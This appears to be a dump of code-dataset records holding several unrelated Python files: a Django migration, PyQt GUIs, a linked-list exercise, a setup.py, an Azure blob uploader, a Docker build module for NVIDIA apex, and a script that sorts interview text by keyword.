serialize=False, primary_key=True, auto_created=True)),\n ('sku', models.CharField(max_length=100)),\n ('movie', models.ForeignKey(to='movies.Movie', related_name='copies')),\n ],\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(max_length=1000)),\n ('imdb_id', models.CharField(null=True, max_length=100, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='movie',\n name='actors',\n field=models.ManyToManyField(related_name='movies', to='movies.Person'),\n ),\n migrations.AddField(\n model_name='movie',\n name='director',\n field=models.ForeignKey(related_name='directed', to='movies.Person', null=True),\n ),\n migrations.AddField(\n model_name='checkout',\n name='movie',\n field=models.ForeignKey(to='movies.MovieCopy', related_name='checkouts'),\n ),\n ]\n","sub_path":"movies/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319387015","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PIL.ImageQt import ImageQt\r\nimport sys,image_create,export_file,file_database\r\n\r\nclass Button(QPushButton):\r\n\r\n def __init__(self,parent,text):\r\n super().__init__(parent)\r\n self.text = text\r\n \r\n \r\nclass TreeView(QTreeView):\r\n\r\n def __init__(self,parent):\r\n super().__init__(parent)\r\n super().setHeaderHidden(True)\r\n\r\nclass Item(QStandardItem):\r\n\r\n def __init__(self,text = \"\",color = QColor(Qt.black),fontSize = 20):\r\n super().__init__()\r\n font = QFont(\"Times New Roman\",fontSize)\r\n self.setEditable(False)\r\n self.setFont(font)\r\n self.setText(text)\r\n\r\nclass TreeModel(QStandardItemModel):\r\n\r\n def __init__(self,parent):\r\n super().__init__(parent)\r\n self.root_node = super().invisibleRootItem\r\n\r\nclass Header :\r\n\r\n def __init__(self,user_name):\r\n self.user_image = ImageQt(image_create.user_image(user_name,\"darkblue\"))\r\n \r\nclass PublicPage(QWidget):\r\n\r\n switch_window = pyqtSignal()\r\n\r\n def __init__(self,user_name):\r\n self.my_database = file_database.File_database()\r\n super().__init__()\r\n self.user_name = user_name\r\n self.run_out = True\r\n self.init_ui()\r\n\r\n def init_ui(self):\r\n self.setWindowTitle(\"File transfer system\")\r\n self.center()\r\n self.set_gui()\r\n \r\n \r\n\r\n def center(self):\r\n frame_geometry = self.frameGeometry()\r\n center_point = QDesktopWidget().availableGeometry().center()\r\n frame_geometry.moveCenter(center_point)\r\n self.move(frame_geometry.topLeft())\r\n\r\n def set_gui(self):\r\n\r\n self.line = 0\r\n\r\n content_button = [\"Public\", \"Inbox\", \"Send\", \"Export\", \"Import\",\"Log out\"]\r\n self.global_object = []\r\n self.header_image = self.image(Header(self.user_name).user_image)\r\n self.vertical_layout = QVBoxLayout()\r\n self.vertical_layout.addWidget(self.header_image)\r\n\r\n self.main_zone = QGridLayout()\r\n for num in range(len(content_button)):\r\n item = Button(self,content_button[num])\r\n item.setStyleSheet(\"background-color : rgb(0,255,0);\")\r\n item.setText(item.text)\r\n if item.text == \"Log out\" :\r\n self.global_object.append(item)\r\n self.check_item(item)\r\n self.main_zone.addWidget(item,num*2,0,2,2)\r\n self.line += num\r\n\r\n self.main_zone.addWidget(TreeView(self),0,3,2*len(content_button),2*len(content_button))\r\n \r\n find_label = QLabel()\r\n find_label.setText(\"find : \")\r\n find_label.setAlignment(Qt.AlignCenter)\r\n self.main_zone.addWidget(find_label,self.line+1,0,2,2)\r\n self.main_zone.addWidget(QLineEdit(self),self.line+1,3,2,2*(len(content_button)-1))\r\n\r\n self.search_button_function_name = [\"----->\",\"Reset\"]\r\n \r\n for num in range(len(self.search_button_function_name)):\r\n item = Button(self,self.search_button_function_name[num])\r\n item.setStyleSheet(\"background-color : rgb(0,255,100);\")\r\n item.setText(item.text)\r\n self.check_item(item)\r\n self.main_zone.addWidget(item,self.line+1,3+2*(len(content_button)-1)+num,1,1)\r\n \r\n \r\n self.vertical_layout.addLayout(self.main_zone)\r\n self.setLayout(self.vertical_layout)\r\n\r\n def image(self,picture):\r\n self.new_image = QLabel(\"\",self)\r\n new_image = QPixmap.fromImage(picture)\r\n self.new_image.setPixmap(new_image.scaled(new_image.width()//2,new_image.height()//2))\r\n self.new_image.setSizePolicy(QSizePolicy.Preferred,QSizePolicy.Preferred)\r\n self.new_image.setAlignment(Qt.AlignCenter)\r\n return self.new_image\r\n\r\n def check_item(self,item):\r\n if item.text == \"Export\" :\r\n item.clicked.connect(self.export)\r\n elif item.text == \"Log out\":\r\n item.clicked.connect(self.logout)\r\n def export(self):\r\n self.dialog = export_file.ExportForm(self.user_name)\r\n self.dialog.my_database = self.my_database\r\n\r\n def logout(self):\r\n self.run_out = False\r\n self.switch_window.emit()\r\n print(\"LogOut Complete\")\r\n\r\n def closeEvent(self,event):\r\n\r\n if self.run_out :\r\n sys.exit()\r\n\r\n \r\n \r\n \r\n","sub_path":"update/19_10_63/index_page.py","file_name":"index_page.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"649400869","text":"# -*- coding: utf-8 -*-\nfrom .__module__ import Module, dependency, source\nfrom .python import Python\nfrom .pytorch import Pytorch\n\n\n@dependency(Python, Pytorch)\n@source('git')\nclass Apex(Module):\n\n def build(self):\n return r'''\n RUN $GIT_CLONE https://github.com/NVIDIA/apex.git && \\\n cd apex && \\\n pip install -v --no-cache-dir --global-option=\"--cpp_ext\" --global-option=\"--cuda_ext\" ./\n '''\n","sub_path":"generator/modules/apex.py","file_name":"apex.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485743475","text":"import pandas as pd\nimport os\nfrom re import search\nfrom re import IGNORECASE\n\ndef get_filename_from_line(line):\n first_word = line.split('>')[0]\n filename_word = first_word.split('\\\\\\\\')[-1]\n return filename_word + \".txt\"\n\ndef any_harassment_keyword_in_line(line):\n harassment_keywords = [\"hanky panky\", \"fondle\", \"title ix\"]\n for keyword in harassment_keywords:\n if search(keyword, line, IGNORECASE):\n return True\n\n return False\n\ndef main():\n interviews_df = pd.read_csv(\"interviews.csv\")\n interviewees_df = pd.read_csv(\"interviewees.csv\")\n # Parse the .txt file, creating map from filenames to text content\n filenames_to_event_extent_dict = {}\n with open(\"Event (Extent).txt\", encoding=\"utf-8\") as fp:\n text_lines = fp.readlines()\n current_filename = \"\"\n for line in text_lines:\n if \"Reliability Subcorpus\" in line:\n current_filename = \"Reliability\"\n elif \" 0:\n f.write(current_filename + \" - \" + str(filename_to_decade_dict[current_filename]) + \"\\n\")\n for line in harassment_lines:\n f.write(line)\n\n f.close()\n\n print(\"Harassment filenames total: \" + str(harassment_total))\n\n #Consolidate the text\n f = open(\"event_extent_harassment.txt\", \"a+\", encoding=\"utf-8\")\n for filename in os.listdir(\"Sorted Text/\"):\n with open(\"Sorted Text/\" + filename, encoding=\"utf-8\") as fp:\n all_lines = fp.readlines()\n for line in all_lines:\n f.write(line)\n f.close()\n\nif __name__ == '__main__':\n main()","sub_path":"Event (Extent) Processing/sort_extent_by_birth_decade_harassment.py","file_name":"sort_extent_by_birth_decade_harassment.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193358124","text":"class Node:\r\n\r\n def __init__(self, data):\r\n self.prev = None\r\n self.data = data\r\n self.next = None\r\n\r\n @staticmethod\r\n def display(S_Id):\r\n print(\"Student id = \", S_Id)\r\n\r\n\r\nclass doublyLinkedlist:\r\n\r\n def __init__(self):\r\n self.start = None\r\n\r\n def getLength(self):\r\n if self.start is not None:\r\n count = 1\r\n ptr = self.start\r\n while ptr.next is not None:\r\n count = count + 1\r\n ptr = ptr.next\r\n print(count)\r\n return count\r\n else:\r\n print(\"Linked List is Empty\")\r\n return 0\r\n\r\n def traversing(self):\r\n ptr = self.start\r\n if ptr is None:\r\n print(\"Empty List \")\r\n else:\r\n while ptr is not None:\r\n print(f\"{ptr.prev}\\t{ptr.data}\\t{ptr.next}\\t{ptr}\")\r\n # print(ptr.data)\r\n ptr = ptr.next\r\n\r\n def searching(self, value):\r\n ptr = self.start\r\n count = 1\r\n while ptr is not None:\r\n if ptr.data == value:\r\n return count\r\n else:\r\n ptr = ptr.next\r\n count = count + 1\r\n return -1\r\n\r\n def insertBegin(self, newNode):\r\n newNode.prev = None\r\n newNode.next = self.start\r\n self.start.prev = newNode\r\n self.start = newNode\r\n\r\n def insertBeforenode(self, targetNode, newNode):\r\n flag = self.searching(targetNode.data)\r\n if flag != -1:\r\n if targetNode != self.start:\r\n ptr = self.start\r\n prevPtr = None\r\n while ptr != targetNode:\r\n prevPtr = ptr\r\n ptr = ptr.next\r\n prevPtr.next = newNode\r\n newNode.prev = prevPtr\r\n ptr.prev = newNode\r\n newNode.next = ptr\r\n else:\r\n self.insertBegin(newNode)\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def insertAfternode(self, targetNode, newNode):\r\n flag = self.searching(targetNode.data)\r\n if flag != -1:\r\n ptr = self.start\r\n while ptr.next is not None:\r\n ptr = ptr.next\r\n if targetNode != ptr:\r\n ptr = self.start\r\n nextPtr = ptr.next\r\n while ptr != targetNode:\r\n ptr = ptr.next\r\n nextPtr = ptr.next\r\n nextPtr.prev = newNode\r\n newNode.next = nextPtr\r\n ptr.next = newNode\r\n newNode.prev = ptr\r\n elif targetNode == ptr:\r\n self.insertEnd(newNode)\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def insertEnd(self, newNode):\r\n if self.start is not None:\r\n newNode.next = None\r\n ptr = self.start\r\n while ptr.next is not None:\r\n ptr = ptr.next\r\n ptr.next = newNode\r\n newNode.prev = ptr\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def delete_startNode(self):\r\n if self.start is not None:\r\n ptr = self.start\r\n self.start = ptr.next\r\n ptr = ptr.next\r\n ptr.prev = None\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def delete_node_before(self, targetNode):\r\n flag = self.searching(targetNode.data)\r\n if flag > 2:\r\n ptr = self.start\r\n prevPtr = ptr\r\n nextPtr = ptr.next\r\n while nextPtr != targetNode:\r\n prevPtr = ptr\r\n ptr = ptr.next\r\n nextPtr = ptr.next\r\n prevPtr.next = nextPtr\r\n nextPtr.prev = prevPtr\r\n elif flag == 1:\r\n print(\"Error: There is no node before this node. Hence, deletion can't be performed.\")\r\n elif flag == 2:\r\n self.delete_startNode()\r\n elif flag == -1:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def delete_node_after(self, targetNode):\r\n flag = self.searching(targetNode.data)\r\n length = self.getLength()\r\n if flag != -1:\r\n if flag < length - 1:\r\n ptr = self.start\r\n prevPtr = ptr\r\n nextPtr = ptr.next\r\n while prevPtr != targetNode:\r\n prevPtr = ptr\r\n ptr = ptr.next\r\n nextPtr = ptr.next\r\n prevPtr.next = nextPtr\r\n nextPtr.prev = prevPtr\r\n elif flag == length - 1:\r\n self.delete_endNode()\r\n elif flag == length:\r\n print(\"Error: There is no node present after this. Hence, deletion operation can't be performed.\")\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n def delete_endNode(self):\r\n if self.start is not None:\r\n ptr = self.start\r\n prevPtr = self.start\r\n while ptr.next is not None:\r\n prevPtr = ptr\r\n ptr = ptr.next\r\n prevPtr.next = None\r\n else:\r\n print(\"Error: Node to be deleted is not present in the list.\")\r\n\r\n\r\nstudent1 = Node('A')\r\nstudent2 = Node('B')\r\nstudent3 = Node('C')\r\nstudent1.next = student2\r\nstudent1.prev = None\r\nstudent2.next = student3\r\nstudent2.prev = student1\r\nstudent3.next = None\r\nstudent3.prev = student2\r\n\r\nsciClass = doublyLinkedlist()\r\nsciClass.start = student1\r\nprint(\"\\t\\t\\t\\t\\t ptr.prev \\t\\t\\t\\t\\t ptr.data \\t\\t\\t\\t\\t ptr.next \\t\\t\\t\\t\\t ptr\")\r\nsciClass.traversing()\r\nprint(\"\\tInserting at beginning!!! \")\r\nstudent4 = Node('D')\r\nstudent9 = Node('I')\r\nsciClass.insertBegin(student4)\r\nsciClass.traversing()\r\nprint(\"\\tInserting at beginning using before method!!! \")\r\nsciClass.insertBeforenode(student4, student9)\r\nsciClass.traversing()\r\nprint(\"\\tInserting at ending!!!\")\r\nstudent5 = Node('E')\r\nsciClass.insertEnd(student5)\r\nsciClass.traversing()\r\nprint(\"\\tInserting before node!!! \")\r\nstudent6 = Node('F')\r\nsciClass.insertBeforenode(student1, student6)\r\nsciClass.traversing()\r\nprint(\" \\tInserting after node!!!\")\r\nstudent7 = Node('G')\r\nsciClass.insertAfternode(student3, student7)\r\nsciClass.traversing()\r\nprint(\"\\tInserting last node using after method!!!\")\r\nstudent8 = Node('H')\r\nsciClass.insertAfternode(student5, student8)\r\nsciClass.traversing()\r\n\r\nprint(\"\\tDeleting starting node!!!\")\r\nsciClass.delete_startNode()\r\n# sciClass.delete_node_before(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting after node!!!\")\r\nsciClass.delete_node_after(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting before node!!!\")\r\nsciClass.delete_node_before(student2)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting ending node!!!\")\r\nsciClass.delete_endNode()\r\nsciClass.traversing()\r\nprint(\"\\tDeleting start node using before method!!!\")\r\nsciClass.delete_node_before(student6)\r\nsciClass.traversing()\r\nprint(\"\\tDeleting last node using after method!!!\")\r\nsciClass.delete_node_after(student7)\r\nsciClass.traversing()\r\nprint(\"\\t End \")\r\n","sub_path":"Data Structures in Python/Linked List/DoublyLinkedLists.py","file_name":"DoublyLinkedLists.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"437956884","text":"from setuptools import setup\n\n\ndef read(fname):\n \"\"\" Return file content. \"\"\"\n with open(fname) as f:\n content = f.read()\n\n return content\n\n\ndescription = 'A simple way to manage your project settings'\ntry:\n long_description = read('README.rst')\nexcept IOError:\n long_description = description\n\nDYNAMIC_SETTINGS_REQUIRES = ['jsonpickle==1.4.1']\nTOML_REQUIRES = ['toml==0.10.1']\nYAML_REQUIRES = ['PyYAML==5.3.1']\nCONSUL_REQUIRES = ['consulate==0.6.0'] + DYNAMIC_SETTINGS_REQUIRES\nDATABASE_REQUIRES = ['SQLAlchemy==1.3.19'] + DYNAMIC_SETTINGS_REQUIRES\nMEMCACHED_REQUIRES = ['pymemcache==3.4.0', 'six==1.15.0'] + DYNAMIC_SETTINGS_REQUIRES # noqa\nREDIS_REQUIRES = ['redis==3.5.3', 'six==1.15.0'] + DYNAMIC_SETTINGS_REQUIRES\nS3_REQUIRES = ['boto3==1.15.6'] + DYNAMIC_SETTINGS_REQUIRES\n\nALL_REQUIRES = set(\n CONSUL_REQUIRES +\n DATABASE_REQUIRES +\n MEMCACHED_REQUIRES +\n REDIS_REQUIRES +\n S3_REQUIRES +\n TOML_REQUIRES +\n YAML_REQUIRES\n)\n\n\ndownload_url = 'https://github.com/drgarcia1986/simple-settings/tarball/master'\n\nsetup(\n name='simple-settings',\n version='1.0.0',\n install_requires=[],\n url='https://github.com/drgarcia1986/simple-settings',\n author='Diego Garcia',\n author_email='drgarcia1986@gmail.com',\n keywords='django flask bottle tornado settings configuration conf',\n description=description,\n long_description=long_description,\n download_url=download_url,\n packages=[\n 'simple_settings',\n 'simple_settings.strategies',\n 'simple_settings.dynamic_settings',\n ],\n package_dir={\n 'simple_settings': 'simple_settings',\n 'strategies': 'simple_settings/strategies',\n 'dynamic_settings': 'simple_settings/dynamic_settings',\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n ],\n extras_require={\n 'all': ALL_REQUIRES,\n 'consul': CONSUL_REQUIRES,\n 'database': DATABASE_REQUIRES,\n 'memcached': MEMCACHED_REQUIRES,\n 'redis': REDIS_REQUIRES,\n 's3': S3_REQUIRES,\n 'toml': TOML_REQUIRES,\n 'yaml': YAML_REQUIRES,\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5937799","text":"\"\"\"\n * PyAzBlob 1.0.0 Python Azure Blob Service Bulk Uploader\n * https://github.com/RobertoPrevato/PyAzBlob\n *\n * Copyright 2017, Roberto Prevato\n * https://robertoprevato.github.io\n *\n * Licensed under the MIT license:\n * http://www.opensource.org/licenses/MIT\n\"\"\"\nimport re\nimport os\nimport errno\nimport fnmatch\nimport mimetypes\nimport time\nfrom pathlib import Path\nfrom core.diagnostics import StopWatch\nfrom core.configuration import config\nfrom core.literature import Scribe\nfrom core.exceptions import ArgumentNullException, InvalidArgument, MissingDependency, ConfigurationError\n\n__all__ = [\"pyazupload\", \"pyazupload_entry\"]\n\n# I am a kind person..\ntry:\n from azure.storage.blob import BlockBlobService, ContentSettings\nexcept ImportError:\n raise MissingDependency(\"azure-storage\")\n\n\n# load configuration\nstorage_config = config[\"StorageAccount\"]\n\nif not storage_config:\n raise ConfigurationError(\"missing StorageAccount configuration\")\n\naccount_name = storage_config[\"name\"]\naccount_key = storage_config[\"key\"]\ncontainer_name = storage_config[\"container\"]\n\n\nif not account_key and not account_name:\n raise ConfigurationError(\"missing Storage Account configuration\")\n\nif not account_name:\n raise ConfigurationError(\"missing Storage Account name configuration\")\n\nif not account_key:\n raise ConfigurationError(\"missing Storage Account key configuration\")\n\nif not container_name:\n raise ConfigurationError(\"missing Storage Account destination container name configuration\")\n\n\ndef first_leaf(a):\n return a[:a.index(\"/\")] if \"/\" in a else a\n\n\n# support for subfolders\nif \"/\" in container_name:\n paths_prefix = container_name[container_name.index(\"/\")+1:]\n container_name = first_leaf(container_name)\nelse:\n paths_prefix = \"\"\n\n\ndef read_lines_strip_comments(p):\n lines = [re.sub(\"#.+$\", \"\", x) for x in Scribe.read_lines(p)]\n return [l for l in lines if l]\n\n\ndef load_ignored():\n calling_path = Path.cwd()\n ignore_file = Path(calling_path / \".pyazblobignore\")\n\n if not ignore_file.is_file():\n # no ignore file specified\n return []\n\n return read_lines_strip_comments(str(ignore_file))\n\n\ndef pyazupload_file(file_path, blob_name, block_blob_service):\n file_mime = mimetypes.guess_type(file_path)[0]\n\n print(\"[*] Uploading {} ({})\".format(file_path, file_mime))\n\n # avoid \"\"\" folders:\n while \"//\" in blob_name:\n blob_name = blob_name.replace(\"//\", \"/\")\n\n while \"\\\\\\\\\" in blob_name:\n blob_name = blob_name.replace(\"\\\\\\\\\", \"\\\\\")\n\n while blob_name.startswith(\"\\\\\"):\n blob_name = blob_name[1:]\n\n block_blob_service.create_blob_from_path(\n container_name,\n blob_name,\n file_path,\n content_settings=ContentSettings(content_type=file_mime)\n )\n\n\ndef ensure_folder(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\nensure_folder(\"logs\")\n\n\nfiles_log = os.path.join(\"logs\", \"-\".join([account_name, container_name.replace(\"\\\\\", \"_\").replace(\"/\", \"_\"), \"files.log\"]))\n\n\ndef pyazupload_entry(root_path,\n cut_path=None,\n ignored=None,\n recurse=False,\n force=False,\n sleep=None,\n block_blob_service=None):\n\n with StopWatch() as sw:\n pyazupload(root_path,\n cut_path,\n ignored,\n recurse,\n force,\n sleep,\n block_blob_service)\n\n print(\"[*] Elapsed: {0:.2f}s\".format(sw.elapsed_s))\n\n\ndef pyazupload(root_path,\n cut_path=None,\n ignored=None,\n recurse=False,\n force=False,\n sleep=None,\n block_blob_service=None):\n \"\"\"\n Bulk uploads files found under the given directory inside a configured Azure Storage Blob Service.\n \n :param root_path: root path from which bulk upload should start.\n :param cut_path: portion of root path to cut from uploaded blobs.\n :param ignored: ignored paths.\n :param recurse: whether to recursively upload files in subfolders.\n :param force: whether to force re-upload of files that were uploaded in a previous run (from files.log).\n :param block_blob_service: block blob service to use when uploading files.\n \"\"\"\n if not ignored:\n ignored = []\n \n if force:\n files_uploaded_previously = []\n Scribe.write(\"\", files_log)\n else:\n try:\n files_uploaded_previously = Scribe.read_lines(files_log)\n except FileNotFoundError:\n files_uploaded_previously = []\n\n if not block_blob_service:\n try:\n block_blob_service = BlockBlobService(account_name=account_name,\n account_key=account_key)\n\n # create container (if it already exists, nothing bad happens)\n block_blob_service.create_container(container_name)\n except Exception as ex:\n raise RuntimeError(\"Cannot obtain instance of BlockBlobService. Error details: {}\".format(ex))\n\n if not root_path:\n raise ArgumentNullException(\"root_path\")\n\n p = Path(root_path)\n\n if not p.exists():\n raise InvalidArgument(\"given root path does not exist\")\n\n if not p.is_dir():\n raise InvalidArgument(\"given root path is not a directory\")\n\n # check cut_path\n if cut_path:\n if not root_path.startswith(cut_path):\n raise InvalidArgument(\"root_path must start with given cut_path\")\n else:\n cut_path = root_path\n \n # read ignored files\n ignored_paths = load_ignored() + ignored\n\n # get files;\n items = (x for x in p.iterdir())\n for item in items:\n item_path = str(item)\n\n if os.path.islink(item_path):\n continue\n\n if item_path in files_uploaded_previously:\n print(\"[*] Skipping... \" + item_path)\n continue\n\n if any(fnmatch.fnmatch(item_path, x) for x in ignored_paths):\n print(\"[*] Ignoring... \" + item_path)\n continue\n\n # if the item is a folder, and work is recursive; go to its children\n if item.is_dir():\n if not recurse:\n continue\n else:\n # upload children;\n pyazupload(item_path,\n cut_path,\n ignored,\n recurse,\n force,\n sleep,\n block_blob_service)\n continue\n\n try:\n blob_name = paths_prefix + item_path[len(cut_path):]\n \n pyazupload_file(item_path, blob_name, block_blob_service)\n except Exception as ex:\n print(\"[*] Error while uploading file: \" + item_path + \" - \" + str(ex))\n else:\n # add line to file containing list of uploaded files\n Scribe.add_lines([item_path], files_log)\n\n if sleep and sleep > 1:\n # sleep between uploads\n time.sleep(sleep / 1000.0)\n\n\n","sub_path":"core/pyazblobcore.py","file_name":"pyazblobcore.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55676705","text":"# ! env python3.4\n# -*- coding: utf-8 -*-\n\n# view.py\n# описывает класс TeachersJournal, который реализует визуальное представление\n\nfrom PyQt4 import QtGui, QtCore\nimport sys\nimport controller\nimport os\nfrom datetime import datetime\n\nSIZE_MAINWINDOW = (1000, 500)\nSIZE_NEWPROFILE = (800, 400)\nSIZE_PRINTER = (800, 400)\n\nclass NewProfile(QtGui.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"New Profile\")\n self.resize(SIZE_NEWPROFILE[0], SIZE_NEWPROFILE[1])\n\n self._globalBox_ = QtGui.QHBoxLayout()\n self._vBox1_ = QtGui.QVBoxLayout()\n self._vBox2_ = QtGui.QVBoxLayout()\n self._globalBox_.addLayout(self._vBox2_)\n self._globalBox_.addLayout(self._vBox1_)\n self.setLayout(self._globalBox_)\n\n self._lNameProfile_ = QtGui.QLabel(\"Name Profile:\", parent=self)\n self._vBox1_.addWidget(self._lNameProfile_)\n\n self._tProfileName_ = QtGui.QLineEdit(\"newprofile\", parent=self)\n self._vBox1_.addWidget(self._tProfileName_)\n\n self._rbShowWorkplane_ = QtGui.QRadioButton(\"Show Workplane\", parent = self)\n self._rbShowWorkplane_.setChecked(True)\n self._vBox1_.addWidget(self._rbShowWorkplane_)\n\n self._rbShowSchedule_ = QtGui.QRadioButton(\"Show Schedule\", parent = self)\n self._vBox1_.addWidget(self._rbShowSchedule_)\n \n #self._bShowWorkplane_ = QtGui.QPushButton(\"Show Workplane\", parent=self)\n #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n #self._vBox1_.addWidget(self._bShowWorkplane_)\n\n #self._bShowSchedule_ = QtGui.QPushButton(\"Show Schedule\", parent=self)\n #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n #self._vBox1_.addWidget(self._bShowSchedule_)\n\n self._bSave_ = QtGui.QPushButton(\"Save\", parent=self)\n #QtCore.QObject.connect(self._bSave_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n self._vBox1_.addWidget(self._bSave_)\n\n self._vBox1_.addStretch()\n\n self._table_ = QtGui.QTableView(self)\n self._vBox2_.addWidget(self._table_)\n\n self.show()\n\n def setModelForTable(self, model):\n self._table_.setModel(model)\n\n\nclass Printer(QtGui.QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setWindowTitle(\"Print Journal\")\n self.resize(SIZE_PRINTER[0], SIZE_PRINTER[1])\n\n self._globalBox_ = QtGui.QHBoxLayout()\n self._vBoxLeft_ = QtGui.QVBoxLayout()\n self._vBoxRight_ = QtGui.QVBoxLayout()\n self._globalBox_.addLayout(self._vBoxLeft_)\n self._globalBox_.addLayout(self._vBoxRight_)\n self.setLayout(self._globalBox_)\n\n self._table_ = QtGui.QTableView(self)\n self._vBoxLeft_.addWidget(self._table_)\n\n self._bPrintInXls_ = QtGui.QPushButton(\"Print in XLS-file\", parent=self)\n #QtCore.QObject.connect(self._bShowWorkplane_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n self._vBoxRight_.addWidget(self._bPrintInXls_)\n\n self.show()\n\n def setModelForTable(self, model):\n self._table_.setModel(model)\n\n\nclass About(QtGui.QMessageBox):\n def __init__(self):\n title = \"About Program\"\n text = \"\"\"\\\n Teachers Journal\n Разработчик: Антон Барабанов, 2017\n Написан на: Python 3\n ОС: Microsoft Windows, Linux\n \"\"\"\n super().__init__()\n self.about(None, title, text)\n\n\nclass MainWindow(QtGui.QMainWindow):\n\n def open_profile(self):\n self.file_profile = QtGui.QFileDialog.getOpenFileName(parent=self,\n caption=\"Открыть профиль\",\n filter=\"(*.db)\")\n self.path_name = os.path.split(self.file_profile)\n self.show_table()\n\n def show_table(self):\n if self.path_name:\n if self._rbShowJournal_.isChecked():\n date = self._calendar_.selectedDate().toString(\"dd.MM.yyyy\")\n date = datetime.strptime(date, \"%d.%m.%Y\").date()\n self._table_.setModel(controller.showTableJournal(self.path_name[0],\n self.path_name[1],\n date))\n elif self._rbShowWorkplane_.isChecked():\n self._table_.setModel(controller.showTableWorkplane(self.path_name[0], self.path_name[1]))\n elif self._rbShowSchedule_.isChecked():\n self._table_.setModel(controller.showTableSchedule(self.path_name[0], self.path_name[1]))\n\n def new_profile(self):\n self.newProfile = NewProfile()\n\n def printer(self):\n self.print = Printer()\n\n def about(self):\n self.about = About()\n \n def __init__(self):\n super().__init__()\n self.path_name = \"\"\n self.setWindowTitle(\"Teachers Journal\")\n self.resize(SIZE_MAINWINDOW[0], SIZE_MAINWINDOW[1])\n\n self._centralWidget_ = QtGui.QWidget(self)\n self._centralWidget_.resize(SIZE_MAINWINDOW[0], SIZE_MAINWINDOW[1])\n self._centralWidget_.show()\n self.setCentralWidget(self._centralWidget_)\n\n self._mainGrid_ = QtGui.QGridLayout(self._centralWidget_)\n\n self._calendar_ = QtGui.QCalendarWidget(parent=self._centralWidget_)\n self._calendar_.clicked.connect(self.show_table)\n self._mainGrid_.addWidget(self._calendar_, 0, 0, 1, 2)\n\n _menuBar_ = self.menuBar()\n self._mFile_ = QtGui.QMenu(\"&File\")\n _menuBar_.addMenu(self._mFile_)\n self._mFile_.addAction(\"&Open Profile\", self.open_profile)\n self._mFile_.addAction(\"&New Profile\", self.new_profile)\n self._mFile_.addAction(\"&Print\", self.printer)\n self._mFile_.addAction(\"&Exit\", self.close)\n self._mHelp_ = QtGui.QMenu(\"&Help\")\n _menuBar_.addMenu(self._mHelp_)\n self._mHelp_.addAction(\"&Help\")\n self._mHelp_.addAction(\"&About\", self.about)\n\n self._rbShowJournal_ = QtGui.QRadioButton(\"Show Journal\", parent=self)\n self._rbShowJournal_.setChecked(True)\n self._rbShowJournal_.toggled.connect(self.show_table)\n self._mainGrid_.addWidget(self._rbShowJournal_, 1, 0, 1, 2)\n\n self._rbShowWorkplane_ = QtGui.QRadioButton(\"Show Workplane\", parent=self)\n self._rbShowWorkplane_.toggled.connect(self.show_table)\n self._mainGrid_.addWidget(self._rbShowWorkplane_, 2, 0, 1, 2)\n\n self._rbShowSchedule_ = QtGui.QRadioButton(\"Show Schedule\", parent=self)\n self._rbShowSchedule_.toggled.connect(self.show_table)\n self._mainGrid_.addWidget(self._rbShowSchedule_, 3, 0, 1, 2)\n \n #self._bOpenWorkplane_ = QtGui.QPushButton(\"Open Workplane\", parent=self._centralWidget_)\n #QtCore.QObject.connect(self._bOpenProfile_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n #self._mainGrid_.addWidget(self._bOpenWorkplane_, 1, 0)\n\n #self._bOpenSchedule_ = QtGui.QPushButton(\"Open Schedule\", parent=self._centralWidget_)\n #QtCore.QObject.connect(self._bOpenProfile_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n #self._mainGrid_.addWidget(self._bOpenSchedule_, 1, 1)\n\n self._bSave_ = QtGui.QPushButton(\"Save\", parent=self._centralWidget_)\n #QtCore.QObject.connect(self._bSave_, QtCore.SIGNAL(\"clicked()\"), on_clicked)\n self._mainGrid_.addWidget(self._bSave_, 4, 0, 1, 2)\n\n self._table_ = QtGui.QTableView(self._centralWidget_)\n self._mainGrid_.addWidget(self._table_, 0, 